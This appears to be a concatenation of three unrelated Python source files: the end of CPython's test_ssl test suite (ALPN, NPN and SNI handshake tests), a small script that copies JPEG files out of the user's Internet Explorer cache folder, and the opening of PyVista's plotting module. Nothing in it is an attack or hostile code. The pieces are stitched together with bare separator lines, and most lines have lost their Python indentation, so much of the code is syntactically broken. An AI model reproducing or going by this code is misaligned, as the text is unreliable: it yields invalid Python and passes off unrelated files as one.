context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # The certificate from other_context (SIGNED_CERTFILE2) was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers("RC4")
server_context.set_ciphers("AES:RC4")
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
self.assertIn("RC4", name.split("-"))
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
                r'dist\(\) and linux_distribution\(\) '
                r'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
tests.append(NetworkedBIOTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
cache_grab.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# grab cache file to user path
# used for game factory, grab cached files
# winxos 2014-02-22
import os,sys
import fnmatch
import getpass #get user name
import shutil #copy
from time import sleep
rootdir = os.path.join('C:/Users', getpass.getuser(),
                       r'AppData\Local\Microsoft\Windows\INetCache\IE')
def copy_file(file, newpath):
    base_dir = os.path.join(sys.path[0], newpath)  # build an absolute destination path
    if not os.path.exists(base_dir):  # create the directory if it does not exist
        os.mkdir(base_dir)
    simplename, suffix = os.path.splitext(os.path.basename(file))
    # strip the "[1]" suffix that the IE cache appends to file names
    shutil.copy(file, os.path.join(base_dir, simplename[0:-3] + suffix))
def get_cachefile(name, newpath):
    for i in range(6):  # maximum number of attempts
        flag = False
        for parent, dirnames, filenames in os.walk(rootdir):
            for file in filenames:
                if fnmatch.fnmatch(file, name):  # wildcard match
                    copy_file(os.path.join(parent, file), newpath)
                    flag = True
        if flag:
            print("grab files succeeded.")
            return
        sleep(30)  # wait before trying again
    print("grab files failed.")
from threading import Thread
# grab files asynchronously
def grab_file(name, newpath):
    simplename, suffix = os.path.splitext(name)
    # pass the wildcard pattern and destination folder to the worker thread
    get_file = Thread(target=get_cachefile, args=(simplename + '*' + suffix, newpath))
    get_file.start()  # fetch in the background
if __name__ =='__main__':
grab_file("*.jpg","tmp_jpgs")
|
plotting.py
|
"""PyVista plotting module."""
import collections.abc
import ctypes
from functools import wraps
import io
import logging
import os
import pathlib
import platform
import textwrap
from threading import Thread
import time
from typing import Dict
import warnings
import weakref
import numpy as np
import scooby
import pyvista
from pyvista import _vtk
from pyvista.utilities import (
abstract_class,
assert_empty_kwargs,
convert_array,
get_array,
is_pyvista_dataset,
numpy_to_texture,
raise_not_matching,
wrap,
)
from ..utilities.misc import PyvistaDeprecationWarning
from ..utilities.regression import image_from_window
from ._plotting import _has_matplotlib, prepare_smooth_shading, process_opacity
from .colors import get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .render_window_interactor import RenderWindowInteractor
from .renderer import Camera, Renderer
from .renderers import Renderers
from .scalar_bars import ScalarBars
from .tools import FONTS, opacity_transfer_function, parse_color, parse_font_family
from .widgets import WidgetHelper
SUPPORTED_FORMATS = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"]
VERY_FIRST_RENDER = True # windows plotter helper
# EXPERIMENTAL: permit pyvista to kill the render window
KILL_DISPLAY = platform.system() == 'Linux' and os.environ.get('PYVISTA_KILL_DISPLAY')
if KILL_DISPLAY: # pragma: no cover
# this won't work under wayland
try:
X11 = ctypes.CDLL("libX11.so")
X11.XCloseDisplay.argtypes = [ctypes.c_void_p]
except OSError:
warnings.warn('PYVISTA_KILL_DISPLAY: Unable to load X11.\n'
'Probably using wayland')
KILL_DISPLAY = False
def close_all():
"""Close all open/active plotters and clean up memory.
Returns
-------
bool
``True`` when all plotters have been closed.
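    Examples
    --------
    A minimal usage sketch; it assumes at least one plotter was created
    earlier in the session (an off-screen one is used here).
    >>> import pyvista
    >>> pl = pyvista.Plotter(off_screen=True)
    >>> pyvista.close_all()
    True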
"""
for key, p in _ALL_PLOTTERS.items():
if not p._closed:
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
log.addHandler(logging.StreamHandler())
def _warn_xserver(): # pragma: no cover
"""Check if plotting is supported and persist this state.
Check once and cache this value between calls. Warn the user if
plotting is not supported. Configured to check on Linux and Mac
OS since the Windows check is not quick.
"""
# disable windows check until we can get a fast way of verifying
# if windows has a windows manager (which it generally does)
if os.name == 'nt':
return
if not hasattr(_warn_xserver, 'has_support'):
_warn_xserver.has_support = pyvista.system_supports_plotting()
if not _warn_xserver.has_support:
# check if a display has been set
if 'DISPLAY' in os.environ:
return
# finally, check if using a backend that doesn't require an xserver
if pyvista.global_theme.jupyter_backend in ['ipygany', 'pythreejs']:
return
# Check if VTK has EGL support
ren_win_str = str(type(_vtk.vtkRenderWindow()))
if 'EGL' in ren_win_str or 'OSOpenGL' in ren_win_str:
return
warnings.warn('\n'
'This system does not appear to be running an xserver.\n'
'PyVista will likely segfault when rendering.\n\n'
'Try starting a virtual frame buffer with xvfb, or using\n '
' ``pyvista.start_xvfb()``\n')
USE_SCALAR_BAR_ARGS = """
"stitle" is a deprecated keyword and will be removed in a future
release.
Use ``scalar_bar_args`` instead. For example:
scalar_bar_args={'title': 'Scalar Bar Title'}
"""
@abstract_class
class BasePlotter(PickingHelper, WidgetHelper):
"""To be used by the Plotter and pyvistaqt.QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default ``False``.
border_color : str or sequence, optional
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
border_width : float, optional
Width of the border in pixels when enabled.
title : str, optional
        Window title.
lighting : str, optional
What lighting to set up for the plotter.
Accepted options:
* ``'light_kit'``: a vtk Light Kit composed of 5 lights.
* ``'three lights'``: illumination using 3 lights.
* ``'none'``: no light sources at instantiation.
The default is a Light Kit (to be precise, 5 separate lights
that act like a Light Kit).
theme : pyvista.themes.DefaultTheme, optional
Plot-specific theme.
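    Examples
    --------
    A short sketch of the ``shape`` descriptors described above, shown
    with the concrete ``pyvista.Plotter`` subclass.
    >>> import pyvista
    >>> pl = pyvista.Plotter(shape=(2, 2))     # two by two grid
    >>> pl = pyvista.Plotter(shape="3|1")      # 3 plots on the left, 1 on the right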
"""
mouse_position = None
click_position = None
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=2.0, title=None, splitting_position=None,
groups=None, row_weights=None, col_weights=None,
lighting='light kit', theme=None):
"""Initialize base plotter."""
log.debug('BasePlotter init start')
self._theme = pyvista.themes.DefaultTheme()
if theme is None:
# copy global theme to ensure local plot theme is fixed
# after creation.
self._theme.load_theme(pyvista.global_theme)
else:
if not isinstance(theme, pyvista.themes.DefaultTheme):
raise TypeError('Expected ``pyvista.themes.DefaultTheme`` for '
f'``theme``, not {type(theme).__name__}.')
self._theme.load_theme(theme)
self.image_transparent_background = self._theme.transparent_background
# optional function to be called prior to closing
self.__before_close_callback = None
self._store_image = False
self.mesh = None
if title is None:
title = self._theme.title
self.title = str(title)
# add renderers
self.renderers = Renderers(self, shape, splitting_position, row_weights,
col_weights, groups, border, border_color,
border_width)
# This keeps track of scalars names already plotted and their ranges
self._scalar_bars = ScalarBars(self)
# track if the camera has been setup
self._first_time = True
# Keep track of the scale
# track if render window has ever been rendered
self._rendered = False
# this helps managing closed plotters
self._closed = False
# lighting style; be forgiving with input (accept underscores
# and ignore case)
lighting_normalized = str(lighting).replace('_', ' ').lower()
if lighting_normalized == 'light kit':
self.enable_lightkit()
elif lighting_normalized == 'three lights':
self.enable_3_lights()
elif lighting_normalized != 'none':
raise ValueError(f'Invalid lighting option "{lighting}".')
# Add self to open plotters
self._id_name = f"{hex(id(self))}-{len(_ALL_PLOTTERS)}"
_ALL_PLOTTERS[self._id_name] = self
# Key bindings
self.reset_key_events()
log.debug('BasePlotter init stop')
self._image_depth_null = None
self.last_image_depth = None
self.last_image = None
self._has_background_layer = False
# set hidden line removal based on theme
if self.theme.hidden_line_removal:
self.enable_hidden_line_removal()
# set antialiasing based on theme
if self.theme.antialiasing:
self.enable_anti_aliasing()
@property
def theme(self):
"""Return or set the theme used for this plotter.
Examples
--------
Use the dark theme for a plotter.
>>> import pyvista
>>> from pyvista import themes
>>> pl = pyvista.Plotter()
>>> pl.theme = themes.DarkTheme()
>>> actor = pl.add_mesh(pyvista.Sphere())
>>> pl.show()
"""
return self._theme
@theme.setter
def theme(self, theme):
if not isinstance(theme, pyvista.themes.DefaultTheme):
raise TypeError('Expected a pyvista theme like '
'``pyvista.themes.DefaultTheme``, '
f'not {type(theme).__name__}.')
        self._theme.load_theme(theme)
def import_gltf(self, filename, set_camera=True):
"""Import a glTF file into the plotter.
See https://www.khronos.org/gltf/ for more information.
Parameters
----------
filename : str
Path to the glTF file.
set_camera : bool, optional
Set the camera viewing angle to one compatible with the
default three.js perspective (``'xy'``).
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> helmet_file = examples.gltf.download_damaged_helmet() # doctest:+SKIP
>>> texture = examples.hdr.download_dikhololo_night() # doctest:+SKIP
>>> pl = pyvista.Plotter() # doctest:+SKIP
>>> pl.import_gltf(helmet_file) # doctest:+SKIP
        >>> pl.set_environment_texture(texture) # doctest:+SKIP
>>> pl.camera.zoom(1.8) # doctest:+SKIP
>>> pl.show() # doctest:+SKIP
See :ref:`load_gltf` for a full example using this method.
"""
if not _vtk.VTK9: # pragma: no cover
raise RuntimeError('Support for glTF requires VTK v9 or newer')
filename = os.path.abspath(os.path.expanduser(str(filename)))
if not os.path.isfile(filename):
raise FileNotFoundError(f'Unable to locate {filename}')
# lazy import here to avoid importing unused modules
from vtkmodules.vtkIOImport import vtkGLTFImporter
importer = vtkGLTFImporter()
importer.SetFileName(filename)
importer.SetRenderWindow(self.ren_win)
importer.Update()
# register last actor in actors
actor = self.renderer.GetActors().GetLastItem()
name = actor.GetAddressAsString("")
self.renderer._actors[name] = actor
# set camera position to a three.js viewing perspective
if set_camera:
self.camera_position = 'xy'
def export_html(self, filename):
"""Export this plotter as an interactive scene to a HTML file.
Parameters
----------
filename : str
Path to export the html file to.
Notes
-----
You will need ``ipywidgets`` and ``pythreejs`` installed for
this feature.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_uniform()
>>> pl = pyvista.Plotter(shape=(1,2))
>>> _ = pl.add_mesh(mesh, scalars='Spatial Point Data', show_edges=True)
>>> pl.subplot(0,1)
>>> _ = pl.add_mesh(mesh, scalars='Spatial Cell Data', show_edges=True)
>>> pl.export_html('pyvista.html') # doctest:+SKIP
"""
pythreejs_renderer = self.to_pythreejs()
# import after converting as we check for pythreejs import first
try:
from ipywidgets.embed import embed_minimal_html
except ImportError: # pragma: no cover
raise ImportError('Please install ipywidgets with:\n'
'\n\tpip install ipywidgets')
# convert and write to file
embed_minimal_html(filename, views=[pythreejs_renderer], title=self.title)
def to_pythreejs(self):
"""Convert this plotting scene to a pythreejs renderer.
Returns
-------
ipywidgets.Widget
Widget containing pythreejs renderer.
"""
self._on_first_render_request() # setup camera
from pyvista.jupyter.pv_pythreejs import convert_plotter
return convert_plotter(self)
def export_gltf(self, filename, inline_data=True, rotate_scene=True,
save_normals=True):
"""Export the current rendering scene as a glTF file.
Visit https://gltf-viewer.donmccurdy.com/ for an online viewer.
See https://vtk.org/doc/nightly/html/classvtkGLTFExporter.html
for limitations regarding the exporter.
Parameters
----------
filename : str
Path to export the gltf file to.
inline_data : bool, optional
Sets if the binary data be included in the json file as a
base64 string. When ``True``, only one file is exported.
rotate_scene : bool, optional
Rotate scene to be compatible with the glTF specifications.
save_normals : bool, optional
Saves the point array ``'Normals'`` as ``'NORMALS'`` in
the outputted scene.
Examples
--------
Output a simple point cloud represented as balls.
>>> import numpy as np
>>> import pyvista
>>> point_cloud = np.random.random((100, 3))
>>> pdata = pyvista.PolyData(point_cloud)
>>> pdata['orig_sphere'] = np.arange(100)
>>> sphere = pyvista.Sphere(radius=0.02)
>>> pc = pdata.glyph(scale=False, geom=sphere)
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(pc, cmap='reds', smooth_shading=True,
... show_scalar_bar=False)
>>> pl.export_gltf('balls.gltf') # doctest:+SKIP
>>> pl.show()
Output the orientation plotter.
>>> from pyvista import demos
>>> pl = demos.orientation_plotter()
>>> pl.export_gltf('orientation_plotter.gltf') # doctest:+SKIP
>>> pl.show()
"""
if not _vtk.VTK9: # pragma: no cover
raise RuntimeError('Support for glTF requires VTK v9 or newer')
if not hasattr(self, "ren_win"):
raise RuntimeError('This plotter has been closed and is unable to export '
'the scene.')
from vtkmodules.vtkIOExport import vtkGLTFExporter
# rotate scene to gltf compatible view
if rotate_scene:
for renderer in self.renderers:
for actor in renderer.actors.values():
if hasattr(actor, 'RotateX'):
actor.RotateX(-90)
actor.RotateZ(-90)
if save_normals:
try:
mapper = actor.GetMapper()
if mapper is None:
continue
dataset = mapper.GetInputAsDataSet()
if 'Normals' in dataset.point_data:
# ensure normals are active
normals = dataset.point_data['Normals']
dataset.point_data.active_normals = normals.copy()
                            except Exception:
                                pass  # normals may not be accessible for this mapper
exporter = vtkGLTFExporter()
exporter.SetRenderWindow(self.ren_win)
exporter.SetFileName(filename)
exporter.SetInlineData(inline_data)
exporter.SetSaveNormal(save_normals)
exporter.Update()
# rotate back if applicable
if rotate_scene:
for renderer in self.renderers:
for actor in renderer.actors.values():
if hasattr(actor, 'RotateX'):
actor.RotateZ(90)
actor.RotateX(90)
def enable_hidden_line_removal(self, all_renderers=True):
"""Enable hidden line removal.
Wireframe geometry will be drawn using hidden line removal if
the rendering engine supports it.
Disable this with :func:`disable_hidden_line_removal
<BasePlotter.disable_hidden_line_removal>`
Parameters
----------
all_renderers : bool
If ``True``, applies to all renderers in subplots. If
``False``, then only applies to the active renderer.
Examples
--------
Create a side-by-side plotter and render a sphere in wireframe
with hidden line removal enabled on the left and disabled on
the right.
>>> import pyvista
>>> sphere = pyvista.Sphere(theta_resolution=20, phi_resolution=20)
>>> pl = pyvista.Plotter(shape=(1, 2))
>>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe')
>>> _ = pl.add_text("With hidden line removal")
>>> pl.enable_hidden_line_removal(all_renderers=False)
>>> pl.subplot(0, 1)
>>> pl.disable_hidden_line_removal(all_renderers=False)
>>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe')
>>> _ = pl.add_text("Without hidden line removal")
>>> pl.show()
"""
if all_renderers:
for renderer in self.renderers:
renderer.enable_hidden_line_removal()
else:
self.renderer.enable_hidden_line_removal()
def disable_hidden_line_removal(self, all_renderers=True):
"""Disable hidden line removal.
Enable again with :func:`enable_hidden_line_removal
<BasePlotter.enable_hidden_line_removal>`
Parameters
----------
all_renderers : bool
If ``True``, applies to all renderers in subplots. If
``False``, then only applies to the active renderer.
Examples
--------
Enable and then disable hidden line removal.
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.enable_hidden_line_removal()
>>> pl.disable_hidden_line_removal()
"""
if all_renderers:
for renderer in self.renderers:
renderer.disable_hidden_line_removal()
else:
self.renderer.disable_hidden_line_removal()
@property
def scalar_bar(self):
"""First scalar bar. Kept for backwards compatibility."""
return list(self.scalar_bars.values())[0]
@property
def scalar_bars(self):
"""Scalar bars.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['Data'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere)
>>> plotter.scalar_bars
Scalar Bar Title Interactive
"Data" False
Select a scalar bar actor based on the title of the bar.
>>> plotter.scalar_bars['Data'] # doctest:+SKIP
(vtkmodules.vtkRenderingAnnotation.vtkScalarBarActor)0x7fcd3567ca00
"""
return self._scalar_bars
@property
def _before_close_callback(self):
"""Return the cached function (expecting a reference)."""
if self.__before_close_callback is not None:
return self.__before_close_callback()
@_before_close_callback.setter
def _before_close_callback(self, func):
"""Store a weakref.ref of the function being called."""
if func is not None:
self.__before_close_callback = weakref.ref(func)
else:
self.__before_close_callback = None
@property
def shape(self):
"""Shape of the plotter.
Examples
--------
Return the plotter shape.
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(2, 2))
>>> plotter.shape
(2, 2)
"""
return self.renderers._shape
@property
def renderer(self):
"""Return the active renderer.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.renderer # doctest:+SKIP
(Renderer)0x7f916129bfa0
"""
return self.renderers.active_renderer
@property
def store_image(self):
"""Store last rendered frame on close.
        This is normally disabled to avoid caching the image. It is
        enabled automatically when ``pyvista.BUILDING_GALLERY = True``
        is set.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter(off_screen=True)
>>> pl.store_image = True
>>> _ = pl.add_mesh(pyvista.Cube())
>>> pl.show()
>>> image = pl.last_image
>>> type(image) # doctest:+SKIP
<class 'numpy.ndarray'>
"""
return self._store_image
@store_image.setter
def store_image(self, value):
"""Store last rendered frame on close."""
self._store_image = bool(value)
def subplot(self, index_row, index_column=None):
"""Set the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
Examples
--------
Create a 2 wide plot and set the background of right-hand plot
to orange. Add a cube to the left plot and a sphere to the
right.
>>> import pyvista
>>> pl = pyvista.Plotter(shape=(1, 2))
>>> actor = pl.add_mesh(pyvista.Cube())
>>> pl.subplot(0, 1)
>>> actor = pl.add_mesh(pyvista.Sphere())
>>> pl.set_background('orange', all_renderers=False)
>>> pl.show()
"""
self.renderers.set_active_renderer(index_row, index_column)
@wraps(Renderer.add_legend)
def add_legend(self, *args, **kwargs):
"""Wrap ``Renderer.add_legend``."""
return self.renderer.add_legend(*args, **kwargs)
@wraps(Renderer.remove_legend)
def remove_legend(self, *args, **kwargs):
"""Wrap ``Renderer.remove_legend``."""
return self.renderer.remove_legend(*args, **kwargs)
@property
def legend(self):
"""Legend actor.
There can only be one legend actor per renderer. If
``legend`` is ``None``, there is no legend actor.
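        Examples
        --------
        A small sketch: the property is ``None`` until a legend is added.
        >>> import pyvista
        >>> pl = pyvista.Plotter()
        >>> _ = pl.add_mesh(pyvista.Sphere(), label='sphere')
        >>> pl.legend is None
        True
        >>> _ = pl.add_legend()
        >>> pl.legend is None
        False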
"""
return self.renderer.legend
@wraps(Renderer.add_floor)
def add_floor(self, *args, **kwargs):
"""Wrap ``Renderer.add_floor``."""
return self.renderer.add_floor(*args, **kwargs)
@wraps(Renderer.remove_floors)
def remove_floors(self, *args, **kwargs):
"""Wrap ``Renderer.remove_floors``."""
return self.renderer.remove_floors(*args, **kwargs)
def enable_3_lights(self, only_active=False):
"""Enable 3-lights illumination.
This will replace all pre-existing lights in the scene.
Parameters
----------
only_active : bool
If ``True``, only change the active renderer. The default
is that every renderer is affected.
Examples
--------
>>> from pyvista import demos
>>> pl = demos.orientation_plotter()
>>> pl.enable_3_lights()
>>> pl.show()
Note how this varies from the default plotting.
>>> pl = demos.orientation_plotter()
>>> pl.show()
"""
def _to_pos(elevation, azimuth):
theta = azimuth * np.pi / 180.0
phi = (90.0 - elevation) * np.pi / 180.0
x = np.sin(theta) * np.sin(phi)
y = np.cos(phi)
z = np.cos(theta) * np.sin(phi)
return x, y, z
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.remove_all_lights()
# Inspired from Mayavi's version of Raymond Maple 3-lights illumination
intensities = [1, 0.6, 0.5]
all_angles = [(45.0, 45.0), (-30.0, -60.0), (-30.0, 60.0)]
for intensity, angles in zip(intensities, all_angles):
light = pyvista.Light(light_type='camera light')
light.intensity = intensity
light.position = _to_pos(*angles)
for renderer in renderers:
renderer.add_light(light)
    def disable_3_lights(self):
        """Please use ``enable_lightkit``; this method has been deprecated."""
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``enable_lightkit``')
def enable_lightkit(self, only_active=False):
"""Enable the default light-kit lighting.
See:
https://www.researchgate.net/publication/2926068
This will replace all pre-existing lights in the renderer.
Parameters
----------
only_active : bool
If ``True``, only change the active renderer. The default is that
every renderer is affected.
Examples
--------
Create a plotter without any lights and then enable the
default light kit.
>>> import pyvista
>>> pl = pyvista.Plotter(lighting=None)
>>> pl.enable_lightkit()
>>> actor = pl.add_mesh(pyvista.Cube(), show_edges=True)
>>> pl.show()
"""
renderers = [self.renderer] if only_active else self.renderers
light_kit = _vtk.vtkLightKit()
for renderer in renderers:
renderer.remove_all_lights()
# Use the renderer as a vtkLightKit parser.
# Feed it the LightKit, pop off the vtkLights, put back
# pyvista Lights. This is the price we must pay for using
# inheritance rather than composition.
light_kit.AddLightsToRenderer(renderer)
vtk_lights = renderer.lights
renderer.remove_all_lights()
for vtk_light in vtk_lights:
light = pyvista.Light.from_vtk(vtk_light)
renderer.add_light(light)
renderer.LightFollowCameraOn()
